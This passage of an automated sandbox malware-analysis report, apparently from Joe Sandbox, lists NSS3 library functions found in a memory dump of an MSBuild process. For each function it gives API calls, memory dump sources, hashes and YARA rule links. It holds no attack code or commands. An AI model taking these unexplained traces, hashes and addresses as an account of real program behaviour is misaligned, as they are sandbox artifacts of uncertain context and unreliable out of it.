                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC35
                                                                                          • Part of subcall function 6C6ACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6ACF16
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6CAB3E,?,?,?), ref: 6C6CAC55
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E,?,?), ref: 6C6CAC70
                                                                                          • Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE33C
                                                                                          • Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE350
                                                                                          • Part of subcall function 6C6AE300: PR_Unlock.NSS3(?), ref: 6C6AE5BC
                                                                                          • Part of subcall function 6C6AE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C6AE5CA
                                                                                          • Part of subcall function 6C6AE300: TlsGetValue.KERNEL32 ref: 6C6AE5F2
                                                                                          • Part of subcall function 6C6AE300: EnterCriticalSection.KERNEL32(?), ref: 6C6AE606
                                                                                          • Part of subcall function 6C6AE300: PORT_Alloc_Util.NSS3(?), ref: 6C6AE613
                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6CAC92
                                                                                        • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6CAB3E), ref: 6C6CACD7
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6CAD10
                                                                                        • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C6CAD2B
                                                                                          • Part of subcall function 6C6AF360: TlsGetValue.KERNEL32(00000000,?,6C6CA904,?), ref: 6C6AF38B
                                                                                          • Part of subcall function 6C6AF360: EnterCriticalSection.KERNEL32(?,?,?,6C6CA904,?), ref: 6C6AF3A0
                                                                                          • Part of subcall function 6C6AF360: PR_Unlock.NSS3(?,?,?,?,6C6CA904,?), ref: 6C6AF3D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2926855110-0
                                                                                        • Opcode ID: 109d2711b0212024dfe46aa79d2a903e659e5df0587ebdd811e9506eedd80593
                                                                                        • Instruction ID: 7a1ad5a4686c608eb20cdfcef41e5a60c3871837cbce09bd0ad196dd4dbe0bfc
                                                                                        • Opcode Fuzzy Hash: 109d2711b0212024dfe46aa79d2a903e659e5df0587ebdd811e9506eedd80593
                                                                                        • Instruction Fuzzy Hash: C8313BB1F006095FEB009F65CC409AF77B6EF8531CB188128E8159B741EB31ED15C7AA
                                                                                        Function 6C6A8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_Now.NSS3 ref: 6C6A8C7C
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A8CB0
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6A8CD1
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6A8CE5
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A8D2E
                                                                                        • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C6A8D62
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A8D93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                        • String ID:
                                                                                        • API String ID: 3131193014-0
                                                                                        • Opcode ID: 6cbe00f4b3b28670fdf45f92c9e71adb0c25f8becdafc205ad5faff97c9e076b
                                                                                        • Instruction ID: 6750ee5000de35a3bfd98fc2241821440adfa48caa5d964ef883aaa3c3ac44d7
                                                                                        • Opcode Fuzzy Hash: 6cbe00f4b3b28670fdf45f92c9e71adb0c25f8becdafc205ad5faff97c9e076b
                                                                                        • Instruction Fuzzy Hash: 92314871A00201AFE700AFA8DC487DAB7B4FF19318F140136EA1967B60D730AD25CBD5
                                                                                        Function 6C6C8500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C6C95DC,00000000,00000000,00000000,?,6C6C95DC,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8517
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C8585
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C859A
                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C7AD8C4,6C6C95D0,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85CC
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C85E1
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6A7F4A,00000000,?), ref: 6C6C85F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
                                                                                        • String ID:
                                                                                        • API String ID: 738345241-0
                                                                                        • Opcode ID: 73c6f2470d5523a2bf9ba9ead9652412b10f7893cd5950c6f1d0af966072ac46
                                                                                        • Instruction ID: e058e3d1fa74c5303dbb5ab51fb07dbfdd1771a4fd1b6f317d0be41925a82bf3
                                                                                        • Opcode Fuzzy Hash: 73c6f2470d5523a2bf9ba9ead9652412b10f7893cd5950c6f1d0af966072ac46
                                                                                        • Instruction Fuzzy Hash: B53149A1F0520057F330451A8C50BAA3219EB2A39CF560677F905D7EF2EB14DD94826F
                                                                                        Function 6C694590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6945B5
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C6945C9
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6945E6
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6945F8
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C694647
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7AA0F4,?), ref: 6C69468C
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6946A1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1594507116-0
                                                                                        • Opcode ID: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
                                                                                        • Instruction ID: 81b1f8c954b8c1dd67d198c75db775887599e5dfc6ffe412995a81d8a2e100ff
                                                                                        • Opcode Fuzzy Hash: cd6db205908f73af521ff4079f7535f323eb0122419390e330757dbc10854959
                                                                                        • Instruction Fuzzy Hash: 1131D4B1A003155BFF104F68DC55BBB36A8AB46358F144039E914DF785EBB5D808C7AA
                                                                                        Function 6C6A2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C69E728,?,00000038,?,?,00000000), ref: 6C6A2E52
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A2E66
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6A2E7B
                                                                                        • EnterCriticalSection.KERNEL32(00000000), ref: 6C6A2E8F
                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C6A2E9E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2EAB
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2F0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                        • String ID:
                                                                                        • API String ID: 3106257965-0
                                                                                        • Opcode ID: d2be4fd0d01d626193aa871603735225b372815f6c7f1eaca63a8e8db1b601b2
                                                                                        • Instruction ID: 8387ab82afe539a56b8489aeee1eb52a1526626a41b4068e5c4f1e3234f2d515
                                                                                        • Opcode Fuzzy Hash: d2be4fd0d01d626193aa871603735225b372815f6c7f1eaca63a8e8db1b601b2
                                                                                        • Instruction Fuzzy Hash: 073146B6A40505ABEB005F69EC448A6B779FF0A359B048174EC0CC3A11FB31ECA5C7E4
                                                                                        Function 6C6D4470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,?,6C697296,00000000), ref: 6C6D4487
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C697296,00000000), ref: 6C6D44A0
                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44BB
                                                                                        • SECMOD_DestroyModule.NSS3(?,?,?,?,6C697296,00000000), ref: 6C6D44DA
                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,6C697296,00000000), ref: 6C6D4530
                                                                                        • free.MOZGLUE(?,?,?,?,?,6C697296,00000000), ref: 6C6D453C
                                                                                        • PORT_FreeArena_Util.NSS3 ref: 6C6D454F
                                                                                          • Part of subcall function 6C6BCAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C69B1EE,D958E836,?,6C6D51C5), ref: 6C6BCAFA
                                                                                          • Part of subcall function 6C6BCAA0: PR_UnloadLibrary.NSS3(?,6C6D51C5), ref: 6C6BCB09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
                                                                                        • String ID:
                                                                                        • API String ID: 3590924995-0
                                                                                        • Opcode ID: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
                                                                                        • Instruction ID: 73bdee2eb0a837a541005823268db57bf23e324e93217448be045fce78997a7b
                                                                                        • Opcode Fuzzy Hash: c4be5c32bc82b32f2fc809cdc24b5869e606e25393f8af732e32e84fb1af3a2e
                                                                                        • Instruction Fuzzy Hash: F3315CB4A04A019FDB00AF38C088669B7F0FF09319F020669D89997B00E771FC94CBC9
                                                                                        Function 6C698C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C698C1B
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C698C34
                                                                                        • PL_ArenaAllocate.NSS3 ref: 6C698C65
                                                                                        • PR_Unlock.NSS3 ref: 6C698C9C
                                                                                        • PR_Unlock.NSS3 ref: 6C698CB6
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                        • String ID: KRAM
                                                                                        • API String ID: 4127063985-3815160215
                                                                                        • Opcode ID: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
                                                                                        • Instruction ID: cd18f7683823401893ec913a4e604d078bc46979c038ae59dc60fc5550134b09
                                                                                        • Opcode Fuzzy Hash: 032623890e364082208279cf464d0581570020ee12fb54e5d0941c519a53236a
                                                                                        • Instruction Fuzzy Hash: B02153B1605A02CFDB00AF78C484559BBF4FF49318F15896ED888CB711EB35E895CB99
                                                                                        Function 6C72A540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C72A390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72A415
                                                                                        • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C72A5AC
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C72A5BF
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5C8
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                          • Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                          • Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                          • Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C72A5D9
                                                                                        • PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C72A5E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
                                                                                        • String ID: *@
                                                                                        • API String ID: 2660593509-1483644743
                                                                                        • Opcode ID: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
                                                                                        • Instruction ID: 89f65dd739ad31155dc3d7a78e03b1383eab73ea72d5d3a646e9bacea5a35466
                                                                                        • Opcode Fuzzy Hash: f5cf4653c909b951bfe98933c0ebab35cf59925333e8e3a843b7af40db9fb76a
                                                                                        • Instruction Fuzzy Hash: 352105B1D0020897C7009F2A9E0469FBBF4AF9972CF054228EC5863741EB74A6488BD7
                                                                                        Function 6C792C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_EnterMonitor.NSS3 ref: 6C792CA0
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C792CBE
                                                                                        • calloc.MOZGLUE(00000001,00000014), ref: 6C792CD1
                                                                                        • strdup.MOZGLUE(?), ref: 6C792CE1
                                                                                        • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C792D27
                                                                                        Strings
                                                                                        • Loaded library %s (static lib), xrefs: 6C792D22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                        • String ID: Loaded library %s (static lib)
                                                                                        • API String ID: 3511436785-2186981405
                                                                                        • Opcode ID: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
                                                                                        • Instruction ID: f8a22ee0489480c3c7c0c7612c278c98660c5a10e00b7635a4fc64a20b1b8632
                                                                                        • Opcode Fuzzy Hash: 4323c534238fe5b31ebf386ad0fbdf28c4c4ad34421b78ecf88edd347f025338
                                                                                        • Instruction Fuzzy Hash: AF11EBB67012009FEB509F15EA4966677B4EB4A31DF14853DDC09C7B52DB31E808CBA1
                                                                                        Function 6C710570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteCriticalSection.KERNEL32(6C6FC89B,FFFFFE80,?,6C6FC89B), ref: 6C71058B
                                                                                        • free.MOZGLUE(?,?,6C6FC89B), ref: 6C710592
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105AE
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C6FC89B), ref: 6C7105C2
                                                                                        • DeleteCriticalSection.KERNEL32(6C6FC89B,?,6C6FC89B), ref: 6C7105D8
                                                                                        • free.MOZGLUE(?,?,6C6FC89B), ref: 6C7105DF
                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,6C6FC89B), ref: 6C7105FB
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
